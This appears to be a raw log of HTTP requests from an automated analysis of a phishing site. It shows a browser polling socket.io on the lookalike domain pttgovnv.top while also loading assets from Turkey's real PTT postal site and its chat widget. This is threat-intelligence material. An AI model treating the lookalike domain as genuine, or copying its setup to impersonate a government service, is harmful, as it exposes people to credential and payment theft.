Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liOkF&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liOSJ&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-8430b752c8e66574.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liOuY&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liOkF&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liOkJ&sid=6dVwkVmS0CuJG3kJBQUL HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-46fb893087b26370.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-9869d3074c720ef6.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_error-32d9baaae5c99c79.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/JxrWbfN16VK5LXe_vQYf2/_buildManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/JxrWbfN16VK5LXe_vQYf2/_ssgManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-8430b752c8e66574.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/JxrWbfN16VK5LXe_vQYf2/_middlewareManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-0438cefc59f69f60.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liPMv HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.tr HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://www.ptt.gov.tr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/1c210f4a3e94a33a.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-46fb893087b26370.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_error-32d9baaae5c99c79.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/JxrWbfN16VK5LXe_vQYf2/_ssgManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/6243e9b9a276eab5.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/css/21ec1dd6e7fd01ba.css HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F183logo.a09f11f7.png&w=256&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fyuzyil.ed9dd94c.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/static/JxrWbfN16VK5LXe_vQYf2/_buildManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Ffooter-logo.568f7be2.png&w=1080&q=75 HTTP/1.1Host: www.ptt.gov.trConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=websocket&sid=Jgob5dOCMvYo_mojBQUR HTTP/1.1Host: pttgovnv.topConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://pttgovnv.topSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: JgkGtbe+g3RsTeV4BmY8HQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liPXX&sid=Jgob5dOCMvYo_mojBQUR HTTP/1.1Host: pttgovnv.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pttgovnv.top/help/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P6liPMv HTTP/1.1Host: pttgovnv.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/bootstrap/css/bootstrap.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/fontawesome/css/all.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/css/google_fonts.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/css/page_spa.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /font-awesome/3.2.1/css/font-awesome.css HTTP/1.1Host: netdna.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/css/owl.carousel.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat/alochat.css?wid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t HTTP/1.1Host: pttem.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/assets/css/owl.theme.default.min.css HTTP/1.1Host: chatserver.alo-tech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://chatserver.alo-tech.com/content/spa.html?hostname=pttem.alo-tech.com&lang=tr&queue=[{%22name%22:%22Whatsapp%20Chat%22,%22key%22:%22ahRzfm11c3RlcmktaGl6bWV0bGVyaXISCxIFUXVldWUYgIC47ozj_ggMogEScHR0ZW0uYWxvLXRlY2guY29t%22}]&client_name=&client_email=&phone_number=&cwid=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t&page_origin=https%3A%2F%2Fwww.ptt.gov.trAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/JxrWbfN16VK5LXe_vQYf2/_middlewareManifest.js HTTP/1.1Host: www.ptt.gov.trConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: undefined=1
